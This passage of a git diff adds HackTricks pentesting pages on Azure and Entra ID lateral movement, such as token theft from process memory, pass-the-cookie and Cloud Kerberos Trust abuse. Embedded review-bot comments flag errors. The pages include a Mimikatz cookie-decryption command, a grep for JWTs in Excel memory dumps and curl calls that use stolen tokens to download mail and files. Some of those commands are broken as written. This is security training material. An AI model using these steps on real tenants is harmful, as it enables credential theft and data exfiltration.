+ +## References + +* [https://stealthbits.com/blog/bypassing-mfa-with-pass-the-cookie/](https://stealthbits.com/blog/bypassing-mfa-with-pass-the-cookie/) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
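Review bot: the Mimikatz command in the Attack section (`dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\cookies /unprotect`) only covers old Chrome profiles where each cookie value is DPAPI-encrypted directly; since Chrome 80 the values are AES-256-GCM encrypted with a per-profile key stored in the `Local State` file (that key is what DPAPI protects), so the command also needs `/state:"%localappdata%\Google\Chrome\User Data\Local State"`, and on current builds the database sits at `User Data\Default\Network\Cookies` rather than `Default\Cookies`. Document this or the step silently yields garbage. Also, `With Mimikatz in hand, I am able to extract a user's cookies` is first-person text lifted from the referenced Stealthbits post; reword it to the page's neutral voice (`With Mimikatz it is possible to extract a user's cookies ...`).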
+{% endhint %} diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md new file mode 100644 index 0000000000..301eb11d28 --- /dev/null +++ b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md @@ -0,0 +1,33 @@ +# Az - Phishing Primary Refresh Token (Microsoft Entra) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +**Check:** [**https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/**](https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
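Review bot: the page body is a single external link with no description; add at least a short summary of what the linked post demonstrates (what is phished, what the attacker ends up holding, and what prerequisites apply) so the entry still conveys the technique when the link is unavailable, and put the link under a `## References` heading like the sibling pages instead of the bold `Check:` line.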
+{% endhint %} diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md new file mode 100644 index 0000000000..1520fc868f --- /dev/null +++ b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md @@ -0,0 +1,33 @@ +# Az - Primary Refresh Token (PRT) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +**Chec the post in** [**https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/**](https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/) although another post explaining the same can be found in [**https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30**](https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
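Review bot: typo `Chec the post in` should read `Check the post in`, and the page again consists only of two links; a one-paragraph summary of what a PRT is (the device-bound refresh token Windows obtains at sign-in on an Azure AD joined or hybrid joined device, which Pass the PRT, Pass the Certificate and the Cloud Kerberos Trust pages all build on) would make those cross-references self-contained. Move the links under a `## References` heading to match the rest of this directory.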
+{% endhint %} diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md new file mode 100644 index 0000000000..3512fd8763 --- /dev/null +++ b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md @@ -0,0 +1,65 @@ +# Az - Processes Memory Access Token + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## **Basic Information** + +As explained in [**this video**](https://www.youtube.com/watch?v=OHKZkXC4Duw), some Microsoft software synchronized with the cloud (Excel, Teams...) might **store access tokens in clear-text in memory**. So just **dumping** the **memory** of the process and **grepping for JWT tokens** might grant you access over several resources of the victim in the cloud bypassing MFA. + +Steps: + +1. Dump the excel processes synchronized with in EntraID user with your favourite tool. +2. Run: `string excel.dmp | grep 'eyJ0'` and find several tokens in the output +3. Find the tokens that interest you the most and run tools over them: + +{% code overflow="wrap" %} +```bash +# Check the identity of the token +curl -s -H "Authorization: Bearer " https://graph.microsoft.com/v1.0/me | jq + +# Check the email (you need a token authorized in login.microsoftonline.com) +curl -s -H "Authorization: Bearer " https://outlook.office.com/api/v2.0/me/messages | jq + +# Download a file from Teams +## You need a token that can access graph.microsoft.com +## Then, find the inside the memory and call +curl -s -H "Authorization: Bearer " https://graph.microsoft.com/v1.0/sites//drives | jq + +## Then, list one drive +curl -s -H "Authorization: Bearer " 'https://graph.microsoft.com/v1.0/sites//drives/' | jq + +## Finally, download a file from that drive: +┌──(magichk㉿black-pearl)-[~] +└─$ curl -o -L -H "Authorization: Bearer " '<@microsoft.graph.downloadUrl>' +``` +{% endcode %} + +**Note that these kind of access tokens can be also found inside other processes.** + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
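Review bot: step 2, `string excel.dmp | grep 'eyJ0'`, does not run as written: the tool is `strings`, and the pattern only matches JWT headers that begin with `{"t` (`eyJ0`), missing `{"alg` headers (`eyJh`); `strings excel.dmp | grep -oE 'eyJ[A-Za-z0-9_-]+\.eyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+'` pulls out whole tokens. Inside the code block the `Bearer ` placeholders have lost their `<token>` markers, the `sites//drives` and `<@microsoft.graph.downloadUrl>` placeholders are likewise empty, `curl -o -L` lacks the output filename, and the `┌──(magichk㉿black-pearl)-[~]` prompt lines should be stripped. The comment `you need a token authorized in login.microsoftonline.com` is misleading, since every token here is issued by login.microsoftonline.com; what decides whether a call works is the `aud` claim, so the Outlook call needs an Outlook audience (e.g. `https://outlook.office.com`) and the Graph calls `https://graph.microsoft.com` (base64-decode the middle JWT segment to check before trying). Step 1 also reads `synchronized with in EntraID user`; suggest `Dump the memory of the Excel process running as the Entra ID user with your favourite tool`.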
+{% endhint %} diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/README.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/README.md new file mode 100644 index 0000000000..109104b7e2 --- /dev/null +++ b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/README.md @@ -0,0 +1,86 @@ +# Az AD Connect - Hybrid Identity + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Basic Information + +Integration between **On-premises Active Directory (AD)** and **Azure AD** is facilitated by **Azure AD Connect**, offering various methods that support **Single Sign-on (SSO)**. Each method, while useful, presents potential security vulnerabilities that could be exploited to compromise cloud or on-premises environments: + +* **Pass-Through Authentication (PTA)**: + * Possible compromise of the agent on the on-prem AD, allowing validation of user passwords for Azure connections (on-prem to Cloud). + * Feasibility of registering a new agent to validate authentications in a new location (Cloud to on-prem). + +{% content-ref url="pta-pass-through-authentication.md" %} +[pta-pass-through-authentication.md](pta-pass-through-authentication.md) +{% endcontent-ref %} + +* **Password Hash Sync (PHS)**: + * Potential extraction of clear-text passwords of privileged users from the AD, including credentials of a high-privileged, auto-generated AzureAD user. + +{% content-ref url="phs-password-hash-sync.md" %} +[phs-password-hash-sync.md](phs-password-hash-sync.md) +{% endcontent-ref %} + +* **Federation**: + * Theft of the private key used for SAML signing, enabling impersonation of on-prem and cloud identities. + +{% content-ref url="federation.md" %} +[federation.md](federation.md) +{% endcontent-ref %} + +* **Seamless SSO:** + * Theft of the `AZUREADSSOACC` user's password, used for signing Kerberos silver tickets, allowing impersonation of any cloud user. + +{% content-ref url="seamless-sso.md" %} +[seamless-sso.md](seamless-sso.md) +{% endcontent-ref %} + +* **Cloud Kerberos Trust**: + * Possibility of escalating from Global Admin to on-prem Domain Admin by manipulating AzureAD user usernames and SIDs and requesting TGTs from AzureAD. 
+ +{% content-ref url="az-cloud-kerberos-trust.md" %} +[az-cloud-kerberos-trust.md](az-cloud-kerberos-trust.md) +{% endcontent-ref %} + +* **Default Applications**: + * Compromising an Application Administrator account or the on-premise Sync Account allows modification of directory settings, group memberships, user accounts, SharePoint sites, and OneDrive files. + +{% content-ref url="az-default-applications.md" %} +[az-default-applications.md](az-default-applications.md) +{% endcontent-ref %} + +For each integration method, user synchronization is conducted, and an `MSOL_` account is created in the on-prem AD. Notably, both **PHS** and **PTA** methods facilitate **Seamless SSO**, enabling automatic sign-in for Azure AD computers joined to the on-prem domain. + +To verify the installation of **Azure AD Connect**, the following PowerShell command, utilizing the **AzureADConnectHealthSync** module (installed by default with Azure AD Connect), can be used: + +```powershell +Get-ADSyncConnector +``` + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
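Review bot: `Get-ADSyncConnector` lives in the `ADSync` PowerShell module that Azure AD Connect installs, not in `AzureADConnectHealthSync` (that is the Health agent module); fix the module name in the sentence before the code block and note that the cmdlet only exists on the AD Connect server itself. The `MSOL_` sentence is too broad as well: the `MSOL_<hex>` account is created by the express installation, custom installations use whatever service account was supplied, which is exactly why the Cloud Kerberos Trust page says to enumerate accounts with replication rights instead of searching for the prefix. Minor: the Seamless SSO bullet calls `AZUREADSSOACC` a user; it is a computer account (`AZUREADSSOACC$`).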
+{% endhint %} diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.md new file mode 100644 index 0000000000..6c0e772f8a --- /dev/null +++ b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.md @@ -0,0 +1,76 @@ +# Az - Cloud Kerberos Trust + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +**This post is a summary of** [**https://dirkjanm.io/obtaining-domain-admin-from-azure-ad-via-cloud-kerberos-trust/**](https://dirkjanm.io/obtaining-domain-admin-from-azure-ad-via-cloud-kerberos-trust/) **which can be checked for further information about the attack. This technique is also commented in** [**https://www.youtube.com/watch?v=AFay\_58QubY**](https://www.youtube.com/watch?v=AFay_58QubY)**.** + +## Basic Information + +### Trust + +When a trust is stablished with Azure AD, a **Read Only Domain Controller (RODC) is created in the AD.** The **RODC computer account**, named **`AzureADKerberos$`**. Also, a secondary `krbtgt` account named **`krbtgt_AzureAD`**. This account contains the **Kerberos keys** used for tickets that Azure AD creates. + +Therefore, if this account is compromised it could be possible to impersonate any user... although this is not true because this account is prevented from creating tickets for any common privileged AD group like Domain Admins, Enterprise Admins, Administrators... + +{% hint style="danger" %} +However, in a real scenario there are going to be privileged users that aren't in those groups. So the **new krbtgt account, if compromised, could be used to impersonate them.** +{% endhint %} + +### Kerberos TGT + +Moreover, when a user authenticates on Windows using a hybrid identity **Azure AD** will issue **partial Kerberos ticket along with the PRT.** The TGT is partial because **AzureAD has limited information** of the user in the on-prem AD (like the security identifier (SID) and the name).\ +Windows can then **exchange this partial TGT for a full TGT** by requesting a service ticket for the `krbtgt` service. 
+ +### NTLM + +As there could be services that doesn't support kerberos authentication but NTLM, it's possible to request a **partial TGT signed using a secondary `krbtgt`** key including the **`KERB-KEY-LIST-REQ`** field in the **PADATA** part of the request and then get a full TGT signed with the primary `krbtgt` key **including the NT hash in the response**. + +## Abusing Cloud Kerberos Trust to obtain Domain Admin + +When AzureAD generates a **partial TGT** it will be using the details it has about the user. Therefore, if a Global Admin could modify data like the **security identifier and name of the user in AzureAD**, when requesting a TGT for that user the **security identifier would be a different one**. + +It's not possible to do that through the Microsoft Graph or the Azure AD Graph, but it's possible to use the **API Active Directory Connect** uses to create and update synced users, which can be used by the Global Admins to **modify the SAM name and SID of any hybrid user**, and then if we authenticate, we get a partial TGT containing the modified SID. + +Note that we can do this with AADInternals and update to synced users via the [Set-AADIntAzureADObject](https://aadinternals.com/aadinternals/#set-aadintazureadobject-a) cmdlet. + +### Attack prerequisites + +The success of the attack and attainment of Domain Admin privileges hinge on meeting certain prerequisites: + +* The capability to alter accounts via the Synchronization API is crucial. This can be achieved by having the role of Global Admin or possessing an AD Connect sync account. Alternatively, the Hybrid Identity Administrator role would suffice, as it grants the ability to manage AD Connect and establish new sync accounts. +* Presence of a **hybrid account** is essential. This account must be amenable to modification with the victim account's details and should also be accessible for authentication. +* Identification of a **target victim account** within Active Directory is a necessity. 
Although the attack can be executed on any account already synchronized, the Azure AD tenant must not have replicated on-premises security identifiers, necessitating the modification of an unsynchronized account to procure the ticket. + * Additionally, this account should possess domain admin equivalent privileges but must not be a member of typical AD administrator groups to avoid the generation of invalid TGTs by the AzureAD RODC. + * The most suitable target is the **Active Directory account utilized by the AD Connect Sync service**. This account is not synchronized with Azure AD, leaving its SID as a viable target, and it inherently holds Domain Admin equivalent privileges due to its role in synchronizing password hashes (assuming Password Hash Sync is active). For domains with express installation, this account is prefixed with **MSOL\_**. For other instances, the account can be pinpointed by enumerating all accounts endowed with Directory Replication privileges on the domain object. + +### The full attack + +Check it in the original post: [https://dirkjanm.io/obtaining-domain-admin-from-azure-ad-via-cloud-kerberos-trust/](https://dirkjanm.io/obtaining-domain-admin-from-azure-ad-via-cloud-kerberos-trust/) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
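Review bot: the Trust paragraph has a typo and two fragments: `stablished` → `established`, and `The RODC computer account, named AzureADKerberos$. Also, a secondary krbtgt account named krbtgt_AzureAD.` are not sentences; suggest `The RODC computer account is named AzureADKerberos$, and a secondary krbtgt account, krbtgt_AzureAD, holds the Kerberos keys used for the tickets Azure AD issues.` In the Abusing section `the API Active Directory Connect uses` should be `the synchronization API that Azure AD Connect uses`. The prerequisites bullet `the Azure AD tenant must not have replicated on-premises security identifiers, necessitating the modification of an unsynchronized account` is hard to follow; state the constraint directly (the account whose SID is rewritten must be one whose on-prem SID is not already present in the tenant, which is why the unsynced AD Connect service account is the suggested target) and check the wording against the linked post. Also `doesn't support kerberos` in the NTLM section should be `don't support Kerberos`.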
+{% endhint %} diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-default-applications.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-default-applications.md new file mode 100644 index 0000000000..357b0f863b --- /dev/null +++ b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-default-applications.md @@ -0,0 +1,35 @@ +# Az - Default Applications + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +**Check the techinque in:** [**https://dirkjanm.io/azure-ad-privilege-escalation-application-admin/**](https://dirkjanm.io/azure-ad-privilege-escalation-application-admin/)**,** [**https://www.youtube.com/watch?v=JEIR5oGCwdg**](https://www.youtube.com/watch?v=JEIR5oGCwdg) and [**https://www.youtube.com/watch?v=xei8lAPitX8**](https://www.youtube.com/watch?v=xei8lAPitX8) + +The blog post discusses a privilege escalation vulnerability in Azure AD, allowing Application Admins or compromised On-Premise Sync Accounts to escalate privileges by assigning credentials to applications. The vulnerability, stemming from the "by-design" behavior of Azure AD's handling of applications and service principals, notably affects default Office 365 applications. Although reported, the issue is not considered a vulnerability by Microsoft due to documentation of the admin rights assignment behavior. The post provides detailed technical insights and advises regular reviews of service principal credentials in Azure AD environments. For more detailed information, you can visit the original blog post. + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
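Review bot: typo `techinque` → `technique` on the first line. The summary paragraph refers to `the blog post` and `the original blog post` without naming it and never says what the attacker actually does; name the source (dirkjanm's post, linked above) and state the step concretely (an Application Administrator or the on-prem Sync Account adds a credential to the service principal of one of the default first-party Office 365 applications and then signs in as that service principal to use its granted permissions), so the page describes the technique rather than the existence of a post.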
+{% endhint %} diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.md new file mode 100644 index 0000000000..d2c2f42875 --- /dev/null +++ b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.md @@ -0,0 +1,61 @@ +# Az- Synchronising New Users + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Syncing AzureAD users to on-prem to escalate from on-prem to AzureAD + +I order to synchronize a new user f**rom AzureAD to the on-prem AD** these are the requirements: + +* The **AzureAD user** needs to have a proxy address (a **mailbox**) +* License is not required +* Should **not be already synced** + +{% code overflow="wrap" %} +```powershell +Get-MsolUser -SerachString admintest | select displayname, lastdirsynctime, proxyaddresses, lastpasswordchangetimestamp | fl +``` +{% endcode %} + +When a user like these is found in AzureAD, in order to **access it from the on-prem AD** you just need to **create a new account** with the **proxyAddress** the SMTP email. + +An automatically, this user will be **synced from AzureAD to the on-prem AD user**. + +{% hint style="danger" %} +Notice that to perform this attack you **don't need Domain Admin**, you just need permissions to **create new users**. + +Also, this **won't bypass MFA**. + +Moreover, this was reported an **account sync is no longer possible for admin accounts**. +{% endhint %} + +## References + +* [https://www.youtube.com/watch?v=JEIR5oGCwdg](https://www.youtube.com/watch?v=JEIR5oGCwdg) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/federation.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/federation.md new file mode 100644 index 0000000000..caf83bbd1f --- /dev/null +++ b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/federation.md @@ -0,0 +1,187 @@ +# Az - Federation + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Basic Information + +[From the docs:](https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/whatis-fed)**Federation** is a collection of **domains** that have established **trust**. The level of trust may vary, but typically includes **authentication** and almost always includes **authorization**. A typical federation might include a **number of organizations** that have established **trust** for **shared access** to a set of resources. + +You can **federate your on-premises** environment **with Azure AD** and use this federation for authentication and authorization. This sign-in method ensures that all user **authentication occurs on-premises**. This method allows administrators to implement more rigorous levels of access control. Federation with **AD FS** and PingFederate is available. + +
